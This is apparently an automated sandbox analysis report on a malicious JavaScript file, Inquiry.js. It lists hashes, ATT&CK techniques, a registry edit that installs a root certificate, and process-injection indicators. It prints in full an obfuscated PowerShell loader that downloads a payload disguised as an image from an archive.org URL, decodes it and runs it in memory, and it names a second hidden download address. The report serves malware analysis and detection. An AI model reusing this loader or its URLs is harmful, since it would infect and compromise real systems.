70a82edf7f26167e6b7df16d624d29d45fd220bb47b8407bc58ee6f7b8c822d3

General

Target

Inquiry.js
Size

162KB
MD5

459f759046d6def3f4524d28eab22476
SHA1

46af0da70b77d98d4773023554dacc1f968b93a1
SHA256

70a82edf7f26167e6b7df16d624d29d45fd220bb47b8407bc58ee6f7b8c822d3
SHA512

f440b3263f621ddc3113084c7aa8a9acc876c19c97138f0c923d2a65f30203d3d4141f49bf0997b9426f60c42f667094d74e0e3f8fff2fabebf938fdd0cdf264
SSDEEP

1536:DCd0yFOp29X3u7EWFOm3xE7E9GQ0c4RTXN4uzQ6VJYCkR5O+6puYszWTC4mKcAWy:DCdTFOE9OoWlN0XJzQ6VPk7yx

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

exe.dropper

https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg%20

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
5	2108	wscript.exe
7	2108	wscript.exe
9	2732	powershell.exe
10	2732	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2732	powershell.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	wscript.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2732	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2732	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 2732	2108	wscript.exe	31
PID 2108 wrote to memory of 2732	2108	wscript.exe	31
PID 2108 wrote to memory of 2732	2108	wscript.exe	31

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Inquiry.js
1⤵
- Blocklisted process makes network request
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };$originalText = '#x#.411/elif/ua.moc.srelli#sidenruoblem//:sp##h';$restoredText = $originalText -replace '#', 't';$ImGAeKuoWcnmOsioRbWc = 'https://ia600805.us.archive.org/10/items/new_image_202501/new_image.jpg ';$zKmKBBAfbUGnsWxhAiiz = New-Object System.Net.WebClient;$tZUoLPcfaNfWNPPuuQNL = $zKmKBBAfbUGnsWxhAiiz.DownloadData($ImGAeKuoWcnmOsioRbWc);$UoOZAzuAcLvSicAcLKuh = [System.Text.Encoding]::UTF8.GetString($tZUoLPcfaNfWNPPuuQNL);$CkcWWOGxjxbeZAUGPTSp = '<<BASE64_START>>';$ZrcCaGWcoRxzHkkulGiZ = '<<BASE64_END>>';$CbqKcPceQgaPcoZgIaAi = $UoOZAzuAcLvSicAcLKuh.IndexOf($CkcWWOGxjxbeZAUGPTSp);$tmpOdLZZHhJCGJfWbiRf = $UoOZAzuAcLvSicAcLKuh.IndexOf($ZrcCaGWcoRxzHkkulGiZ);$CbqKcPceQgaPcoZgIaAi -ge 0 -and $tmpOdLZZHhJCGJfWbiRf -gt $CbqKcPceQgaPcoZgIaAi;$CbqKcPceQgaPcoZgIaAi += $CkcWWOGxjxbeZAUGPTSp.Length;$aWiLuziLfnZnGLeRZrin = $tmpOdLZZHhJCGJfWbiRf - $CbqKcPceQgaPcoZgIaAi;$siibUOizcbQuLNGKWfWc = $UoOZAzuAcLvSicAcLKuh.Substring($CbqKcPceQgaPcoZgIaAi, $aWiLuziLfnZnGLeRZrin);$uSqTKGlifAbAKeLRUmfk = -join ($siibUOizcbQuLNGKWfWc.ToCharArray() | ForEach-Object { $_ })[-1..-($siibUOizcbQuLNGKWfWc.Length)];$iqfeZGJtzAJhdcBqdzmR = [System.Convert]::FromBase64String($uSqTKGlifAbAKeLRUmfk);$nZGHGkTBZPiLBmWnLiec = [System.Reflection.Assembly]::Load($iqfeZGJtzAJhdcBqdzmR);$qbPKWBeczbjsBndzhNnZ = [dnlib.IO.Home].GetMethod('VAI');$qbPKWBeczbjsBndzhNnZ.Invoke($null, @($restoredText, 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz', 'MSBuild', 'WfWxdqKLzhtiOjUlGsfz', 'WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','WfWxdqKLzhtiOjUlGsfz','1','WfWxdqKLzhtiOjUlGsfz','TaskName'));if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };if ($null -ne $PSVersionTable -and $PSVersionTable.PSVersion -ne $null) { [void]$PSVersionTable.PSVersion } else { Write-Output 'PowerShell version Not available' };"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2732

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Subvert Trust Controls

1

T1553

Install Root Certificate

1

T1553.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2732-15-0x000007FEF5C0E000-0x000007FEF5C0F000-memory.dmp

Filesize
4KB

Download
memory/2732-16-0x000000001B650000-0x000000001B932000-memory.dmp

Filesize
2.9MB

Download
memory/2732-17-0x0000000001E70000-0x0000000001E78000-memory.dmp

Filesize
32KB

Download
memory/2732-18-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2732-19-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2732-20-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2732-21-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2732-22-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download
memory/2732-23-0x000007FEF5950000-0x000007FEF62ED000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing